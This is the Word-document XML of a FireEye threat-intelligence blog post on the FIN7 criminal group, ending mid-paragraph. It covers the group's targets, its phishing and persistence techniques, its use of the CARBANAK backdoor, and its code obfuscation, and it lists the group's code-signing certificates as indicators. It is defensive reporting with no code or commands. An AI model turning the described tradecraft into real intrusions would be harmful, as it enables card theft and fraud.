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AB26" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195" w:line="288" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="B2282D"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="B2282D"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A984A" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>August 01, 2018 </w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>| by </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tooltip="View all entries filed under 'Fireeye - Authors : Nick Carr'" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Nick Carr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tooltip="View all entries filed under 'Fireeye - Authors : Kimberly Goody'" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Kimberly Goody</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="View all entries filed under 'Fireeye - Authors : Steve Miller'" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Steve Miller</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="View all entries filed under 'Fireeye - Authors : Barry Vengerik'" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Barry Vengerik</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30C10D4D" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CYBER CRIME</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FBI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CARBANAK</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FIN7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79280235"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On Aug. 1, 2018, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>United States District Attorney’s Office for the Western District of Washington</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> unsealed indictments and announced the arrests of three individuals within the leadership ranks of a criminal organization that aligns with activity we have tracked since 2015 as FIN7. These malicious actors are members of one of the most prolific financial threat groups of this decade, having carefully crafted attacks targeted at more than 100 organizations. FIN7 is referred to by many vendors as “Carbanak Group,” although we do not equate all usage of the CARBANAK backdoor with FIN7. This blog explores the range of FIN7's criminal ventures, the technical innovation and social engineering ingenuity that powered their success, a glimpse into their recent campaigns, their apparent use of a security company as a front for criminal operations, and what their success means for the threat landscape moving forward. With this release, FireEye is also providing technical context, historical indicators, and techniques that organizations can use to hunt for FIN7 behavior enterprise-wide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9B726"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FIN7 Does the Crime...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723E514"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The threat group is characterized by their persistent targeting and large-scale theft of payment card data from victim systems, which it has monetized at least a portion of through a prominent card shop. But FIN7’s financial operations were not limited to card data theft. In some instances, when they encountered and could not obtain payment card data from point of sale (POS) systems secured with end-to-end encryption (E2EE) or point-to-point encryption (P2PE), FIN7 pivoted to target finance departments within their victim organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7717F38C"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Furthermore, in April 2017, FireEye reported that </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FIN7 sent spear phishing emails to personnel involved with United States Securities and Exchange Commission (SEC) filings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> at multiple organizations, providing further insight into FIN7’s targeting. These targeted individuals would likely have access to material non-public information that FIN7 actors could use to gain a competitive advantage in stock trading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE74668"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Diversification of their monetization tactics has allowed the group to impact a wide range of industries beyond those solely associated with payment card industry. During campaigns that FireEye associates with FIN7, victims within the following sectors have been targeted within the United States and Europe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84EA0E" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Restaurants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914190B" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Hospitality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03117B83" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Casinos and Gaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC1320" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Energy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3697DB" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Finance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C863F" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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High-tech</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6708FD" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D08D2E" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:spacing w:val="-74"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:spacing w:val="-74"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4EB31" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Travel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F633D" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020EC3A0" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7387E7" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Retail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3153ED" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Telecommunications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DA5FA" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Government</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668507D0" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="7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lastRenderedPageBreak/>
        <w:t>Business services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889A5E9"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FIN7’s Innovation Enabled their Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE976F"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Throughout FireEye’s tracking of FIN7 campaigns, the attackers have attempted to stay ahead of the game and thwart detection, using novel tactics and displaying characteristics of a well-resourced operation. For example, in April 2017, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FireEye blogged about FIN7’s spear phishing emails that leveraged hidden shortcut files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim. This was a direct departure from their established use of weaponized Office macros and highlighted the group’s adaptive nature to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF47B95"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FireEye also previously reported on FIN7’s use of the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CARBANAK backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as a post-exploitation tool to cement their foothold in a network and maintain access to victim environments. CARBANAK is well known for its use in highly profitable and sophisticated attacks dating back to 2013, with usage attributable to FIN7 beginning in late 2015, although how interconnected the campaigns employing the malware over this five-year span are is unclear. FIN7’s use of CARBANAK is particularly notable due to their use of creative persistence mechanisms to launch the backdoor. The group </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>leveraged an application shim database that injected a malicious in-memory patch into the Services Control Manager ("services.exe") process</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and then spawned a CARBANAK backdoor process. FIN7 also used this tactic to install a payment card harvesting utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D35B927"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Another notable characteristic of FIN7 has been their heavy use of </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>digital certificates</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Unsurprisingly, malicious threat actors have sought to exploit the legitimacy afforded by these certificates. By digitally signing their phishing documents, backdoors and later stage tools, FIN7 was able to bypass many security controls that may limit execution of macros from Office documents and restrict execution of unsigned binaries on trusted systems.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9540" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1431"/>
        <w:gridCol w:w="976"/>
        <w:gridCol w:w="4806"/>
        <w:gridCol w:w="2881"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="10247910" w14:textId="77777777" w:rsidTr="009403EE">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0CE59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Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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D06BD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Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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C68B86"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Serial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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E35AF0"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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="5803A3ED" w14:textId="77777777" w:rsidTr="009403EE">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4526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Korsar Travel TOV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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DF94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UA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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6097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88:21:ac:7e:6c:da:11:00:1d:b3:d3:1a:16:c1:5c:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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AB34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korsartravel@bk.ru</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="13776FE5" w14:textId="77777777" w:rsidTr="009403EE">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B4AF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Kaitschuck James</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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B93F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GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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BAB0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30:2e:7f:14:3a:f3:f3:98:20:70:42:4e:ea:52:5d:d2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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1A3BD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oliversoftware@hotmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="611E81AF" w14:textId="77777777" w:rsidTr="009403EE">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0C59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Park Travel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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C58A3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RU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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53E6F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4d:e2:87:56:98:bf:c7:74:a3:f3:47:d6:70:7c:9b:f0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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CFCE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inga@parktravel-mx.ru</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A61F7F1"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Table 1: Sample FIN7 code signing certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71C725"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FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>creating novel obfuscation methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. The threat group regularly tested malicious DOC, DOCX, and RTF phishing documents against public repositories to check static detection engine coverage. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it "FINcoding." These methods inspired </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>deep command line obfuscation research</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and the release of Daniel Bohannon's </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
